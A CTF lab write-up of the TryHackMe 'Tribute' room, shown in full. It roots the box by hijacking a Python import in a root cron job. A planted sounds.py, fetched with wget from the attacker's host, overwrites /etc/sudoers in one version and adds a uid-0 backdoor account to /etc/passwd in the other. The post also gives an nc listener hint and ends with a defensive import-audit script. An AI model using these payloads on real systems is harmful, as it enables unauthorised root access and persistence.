THM: Tribute et al
Updates
I’ve just done Knife on HTB; no writeup obviously - it’s only a day old. I also finished MusicalStego which I can barely remember even starting, and then I did Tribute, which I don’t remember joining.
I’m not going to write much, just a brief mention about Tribute.
The root part takes advantage of a python script running on a one minute cron job as root. Here’s the entry from pspy:
2021/05/24 04:14:01 CMD: UID=0 PID=26303 /bin/sh -c python3 /home/meaghyn/.noises/.noises.py
Now, the content is basically this:
import socket
import sounds
print("creak")
Pretty basic, no? Anyway, the maker seems to have intended for you to use this to launch a reverse shell. One of the questions says:
What needs to be running to make .noises.py run without errors?
A hint given is:
nc -nvklp 1337
And the answer it wants is:
listener
I’m sorry, but that’s ridiculous. The cron job (and hence the script) already runs very happily every 60 seconds without errors; no listener required. And quite frankly we don’t need a listener to get root either. Here are two alternative methods, both using a sounds.py of our own: the script does import sounds, and Python searches the script’s own directory before anything else, so whatever we drop into .noises as sounds.py is what root ends up running. In version 1, we write a NOPASSWD sudoers entry for our user (note the single >, which replaces /etc/sudoers rather than appending to it):
┌──(root💀kali)-[/opt/thm/tributeqf]
└─# cat sounds.py
import os
os.system('echo "meaghyn ALL=(root) NOPASSWD: ALL" > /etc/sudoers')
And on the box:
wget http://10.9.10.123:9090/sounds.py
--2021-05-24 04:29:43-- http://10.9.10.123:9090/sounds.py
Connecting to 10.9.10.123:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 78 [text/x-python]
Saving to: ‘sounds.py’
sounds.py 100%[===================>] 78 --.-KB/s in 0s
2021-05-24 04:29:43 (14.5 MB/s) - ‘sounds.py’ saved [78/78]
meaghyn@ubuntu:~/.noises$ date
date
Mon May 24 04:29:49 PDT 2021
meaghyn@ubuntu:~/.noises$ sudo -l
sudo -l
[sudo] password for meaghyn: meaghyn
Sorry, user meaghyn may not run sudo on ubuntu.
meaghyn@ubuntu:~/.noises$ date
date
Mon May 24 04:30:01 PDT 2021
meaghyn@ubuntu:~/.noises$ sudo -l
sudo -l
User meaghyn may run the following commands on ubuntu:
(root) NOPASSWD: ALL
meaghyn@ubuntu:~/.noises$ sudo su
sudo su
root@ubuntu:/home/meaghyn/.noises# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Mon May 24 04:30:13 PDT 2021
root@ubuntu:/home/meaghyn/.noises#
Boom, roasted. In version 2 we use sounds.py to add root2 to /etc/passwd:
meaghyn@ubuntu:~/.noises$ cat sounds.py
cat sounds.py
import os
os.system('echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd')
meaghyn@ubuntu:~/.noises$ su root2
su root2
Password: mrcake
root@ubuntu:/home/meaghyn/.noises# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Mon May 24 04:21:19 PDT 2021
root@ubuntu:/home/meaghyn/.noises# cd /root
cd /root
root@ubuntu:~#
So there we go; root two ways and no listener required. There’s almost certainly an SSH method available too; write your public key to authorized_keys for root or something. When you’ve got root code execution, the world is your oyster.
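Both versions above work for the same reason: sys.path[0] is the script’s own directory, so a file named sounds.py beside .noises.py wins over anything else. As an added example (not from the room and not the author’s code), here is a small audit script I’d run against root-owned cron jobs to spot that condition: it lists a script’s imports and flags any that a less privileged user could shadow or plant. The demo() function rebuilds the .noises layout in a temporary directory; the uid, file modes and script contents there are constructed.

```python
import ast
import importlib.util
import os
import stat
import sys
import tempfile
from pathlib import Path

def top_level_imports(source):
    """Module names pulled in by plain `import x` statements, e.g. ['socket', 'sounds']."""
    names = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names += [alias.name.split(".")[0] for alias in node.names]
    return names

def writable_by_others(path, owner_uid):
    st = os.stat(path)  # owned by someone else, or group/world writable
    return st.st_uid != owner_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(script_path, owner_uid=0):
    """Classify each import of a script run by owner_uid (0 for a root cron job)."""
    script = Path(script_path)
    # sys.path[0] is the script's own directory, searched before the stdlib.
    dir_writable = writable_by_others(script.parent, owner_uid)
    report = {}
    for name in top_level_imports(script.read_text()):
        shadow = script.parent / f"{name}.py"
        if name in sys.builtin_module_names:  # compiled in, never loaded from sys.path
            report[name] = "builtin"
        elif shadow.exists() and writable_by_others(shadow, owner_uid):
            report[name] = "shadow file writable by others"
        elif dir_writable:
            report[name] = "directory writable: import can be hijacked"
        elif importlib.util.find_spec(name) is None:
            report[name] = "unresolved: a planted file would be loaded"
        else:
            report[name] = "ok"
    return report

def demo():
    """Constructed copy of the Tribute layout in a temp dir (not the real box)."""
    owner = os.getuid()
    noises = Path(tempfile.mkdtemp()) / ".noises"
    noises.mkdir(mode=0o700)
    script = noises / ".noises.py"
    script.write_text("import socket\nimport sounds\nprint('creak')\n")
    locked = audit(script, owner)
    os.chmod(noises, 0o770)  # now group-writable, as a shared home dir might be
    return locked, audit(script, owner)
```

On the real box the directory is owned by meaghyn while cron runs the script as uid 0, so audit(path, 0) flags every import straight away.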